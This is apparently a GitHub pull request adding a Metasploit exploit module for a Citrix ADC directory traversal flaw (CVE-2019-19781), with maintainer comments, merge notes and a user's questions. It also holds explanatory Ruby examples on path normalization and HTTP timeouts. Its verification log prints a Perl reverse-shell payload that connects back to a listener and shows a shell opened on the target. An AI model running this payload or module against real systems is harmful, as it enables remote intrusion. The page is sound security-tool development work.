add citrix path traversal exploit #12816

Merged: 21 commits into rapid7:master, Jan 14, 2020

Conversation

mekhalleh commented Jan 12, 2020

An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Execute the following commands
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > use exploit/unix/webapp/citrix_dir_trasversal_rce
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > set rhost [IP]
rhost => XXX.XXX.XXX.XXX
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > set lhost [IP]
lhost => XXX.XXX.XXX.XXX
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > set verbose true
verbose => true
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > run

[*] Started reverse TCP handler on 0.0.0.0:XXXXX 
[+] The target appears to be vulnerable.
[*] Sending cmd/unix/reverse_perl command payload
[*] Generated command payload: perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"XXX.XXX.XXX.XXX:XXXXX");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Bookmark Added.
[*] Command shell session 1 opened (XXX.XXX.XXX.XXX:XXXXX -> XXX.XXX.XXX.XXX:XXXXX) at XXXX-XX-XX XX:XX:XX +0400

uname -a
FreeBSD xxxxxxxxxxxxxxx 8.4-NETSCALER-13.0 FreeBSD 8.4-NETSCALER-13.0 #0: Fri Oct 11 07:24:57 PDT 2019     root@xxx-xxxxx-xxx:/usr/obj/home/build/rs_130_41_9_RTM/usr.src/sys/NS64  amd64
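The directory-traversal class named in the description above, shown as an added illustration that is not part of this pull request and is not Citrix's code: a constructed allowlist check on a request path, first done naively with a string-prefix test on the raw path and then after collapsing `.` and `..` segments. The prefix `/public/`, the sample request paths and the function names are assumptions made for the example.

```ruby
# Collapse '.' and '..' segments the way an origin server or filesystem
# resolves them, without touching the filesystem. Keeps a trailing slash.
def normalize_path(path)
  out = []
  path.split('/').each do |seg|
    next if seg.empty? || seg == '.'
    if seg == '..'
      out.pop          # never climbs above '/'
    else
      out << seg
    end
  end
  result = '/' + out.join('/')
  result << '/' if path.end_with?('/') && result != '/'
  result
end

# Naive allowlist: a prefix test on the raw request path. Anything that
# starts with the allowed directory passes, including '/public/../admin'.
def naive_allowed?(raw_path, prefix)
  raw_path.start_with?(prefix)
end

# Hardened allowlist: percent-decode once (so '..%2f' is seen as '../'),
# normalize, then test the prefix on the resolved path.
def hardened_allowed?(raw_path, prefix)
  decoded = raw_path.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr }
  normalize_path(decoded).start_with?(prefix)
end

# Constructed sample requests: the first is legitimate, the rest try to
# escape the allowed directory.
SAMPLE_REQUESTS = [
  '/public/index.html',
  '/public/../admin/config',
  '/public/..%2f..%2fetc/passwd',
  '/public/./sub/../../private/key'
].freeze

# Returns [path, naive_verdict, hardened_verdict] for each sample request.
def compare_checks(prefix = '/public/')
  SAMPLE_REQUESTS.map { |p| [p, naive_allowed?(p, prefix), hardened_allowed?(p, prefix)] }
end

if __FILE__ == $PROGRAM_NAME
  compare_checks.each do |path, naive, hardened|
    puts format('%-36s naive=%-5s hardened=%s', path, naive, hardened)
  end
end
```

The naive check admits every escape attempt because the raw string really does begin with the allowed directory; only the resolved path tells you which directory the request will actually reach. A single decode is enough for the constructed inputs here; a server that decodes again downstream would need the check moved after its own decoding.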
mekhalleh added 2 commits Jan 12, 2020
wvu-r7 self-assigned this Jan 12, 2020
mekhalleh added 2 commits Jan 12, 2020
space-r7 added the needs-docs label Jan 13, 2020
space-r7 removed the needs-docs label Jan 13, 2020
wvu-r7 commented Jan 13, 2020

Hi! Thanks for this. We'll be making some final changes to the module and landing with #12813 as the exploit's check method if possible. I'll let you know when I'm ready to merge this. Thanks!

wvu-r7 changed the title from "add citrix path trasversal exploit" to "add citrix path traversal exploit" Jan 14, 2020
Bad habit!
wvu-r7 commented Jan 14, 2020

I forgot about this, sorry:

'HttpClientTimeout' => 5 # This seems sane, but it's not a float

  res = send_request_raw(
    'method' => 'GET',
    'uri' => dir_traversal(path),
    'partial' => true # Allow partial response due to timeout
  )

I'll add a decent default.
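The timeout and partial-response point in the comment above, as an added example that is neither the Metasploit HTTP client nor code from this pull request: a pipe stands in for a target that sends its status line, headers and the start of the body and then stalls. A Float read timeout bounds the wait, and keeping the partial response still lets a check see the status code and body it needs; discarding incomplete responses leaves the same check unable to decide. The marker text, the 4096-byte Content-Length and all function names are assumptions.

```ruby
# Split whatever bytes arrived into [status_code, headers, body].
# A truncated response still yields its status line and headers.
def parse_http_response(raw)
  head, body = raw.split("\r\n\r\n", 2)
  lines = head.to_s.split("\r\n")
  status = lines.shift.to_s[%r{\AHTTP/\d\.\d (\d{3})}, 1].to_i
  headers = {}
  lines.each do |line|
    name, value = line.split(':', 2)
    headers[name.strip.downcase] = value.strip if value
  end
  [status, headers, body.to_s]
end

# Read until EOF or until nothing arrives for read_timeout seconds (a Float,
# so sub-second waits work). Returns [bytes_read, timed_out].
def read_with_timeout(io, read_timeout)
  buf = +''
  loop do
    ready = IO.select([io], nil, nil, read_timeout)
    return [buf, true] if ready.nil?               # idle too long: give up, keep what we have
    chunk = io.read_nonblock(4096, exception: false)
    return [buf, false] if chunk.nil?              # EOF: complete response
    buf << chunk unless chunk == :wait_readable
  end
end

# Constructed stalling target: a thread writes a complete header block and one
# body line into a pipe, then sleeps well past the client's timeout.
MARKER = "marker-line\n"

def stalling_target(stall_for)
  reader, writer = IO.pipe
  Thread.new do
    writer.write("HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n" \
                 "Content-Length: 4096\r\n\r\n#{MARKER}")
    writer.flush
    sleep(stall_for)
    writer.close
  end
  reader
end

# A check in the style of an exploit module's check method: vulnerable only if
# the request came back 200 with the expected marker. With partial: false a
# timed-out (incomplete) response is thrown away and the check returns nil.
def run_check(partial:, read_timeout: 0.2)
  io = stalling_target(read_timeout * 10)
  raw, timed_out = read_with_timeout(io, read_timeout)
  io.close
  return nil if timed_out && !partial
  status, headers, body = parse_http_response(raw)
  {
    status: status,
    declared_length: headers['content-length'].to_i,
    received: body.bytesize,
    timed_out: timed_out,
    vulnerable: status == 200 && body.include?(MARKER)
  }
end

if __FILE__ == $PROGRAM_NAME
  p run_check(partial: true)   # partial body is enough to decide
  p run_check(partial: false)  # nil: the evidence was discarded with the timeout
end
```

The client never waits for the declared 4096 bytes; it stops as soon as the target goes quiet for read_timeout seconds, which is why the timeout has to be short and fractional rather than a whole-second integer when the target is expected to hang.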

wvu-r7 added 2 commits Jan 14, 2020
Totally forgot I did this for Pulse Secure.
Just the comment.
wvu-r7 added a commit that referenced this pull request Jan 14, 2020
wvu-r7 merged commit 72d06b0 into rapid7:master Jan 14, 2020
1 of 3 checks passed
  • Metasploit Automation - Sanity Test Execution: Build triggered for merge commit.
  • continuous-integration/travis-ci/pr: The Travis CI build is in progress
  • Metasploit Automation - Test Execution: Successfully completed all tests.
wvu-r7 commented Jan 14, 2020

Release Notes

This adds an exploit for CVE-2019-19781, a directory traversal vulnerability in Citrix ADC (NetScaler) that can be leveraged to execute an arbitrary command payload.

wvu-r7 commented Jan 14, 2020

@mekhalleh: The exploit has landed. Please review the commits I've added. I hope the changes are positive, and I apologize that I gave you such short notice on this. Thank you!

jmartin-r7 commented Jan 14, 2020

This takes advantage of #12517 & #12737 marking msf5.

secprentice commented Jan 20, 2020

I am trying to use this exploit, but cmd/unix/reverse_perl isn't working with the exploit, nor does it come by default with the exploit. Is this expected?

msf5 exploit(unix/webapp/citrix_access_gateway_exec) > use exploit/unix/webapp/citrix_dir_trasversal_rce

msf5 exploit(unix/webapp/citrix_access_gateway_exec) > set payload cmd/unix/reverse_per
[-] The value specified for payload is not valid.

I can however use cmd/unix/reverse_perl on its own?

msf5 payload(cmd/unix/reverse_perl) > use cmd/unix/reverse_perl

wvu-r7 commented Jan 21, 2020

That is an entirely different module.

secprentice commented Jan 21, 2020

I must be missing something deathly obvious. Thanks for getting back to me, I will try some more to see what I am missing.

wvu-r7 commented Jan 21, 2020

The one you want is exploit/linux/http/citrix_dir_traversal_rce. Hope this helps!

secprentice commented Jan 21, 2020

That helps a lot. A definite misunderstanding on my part. Thank you for the great module.
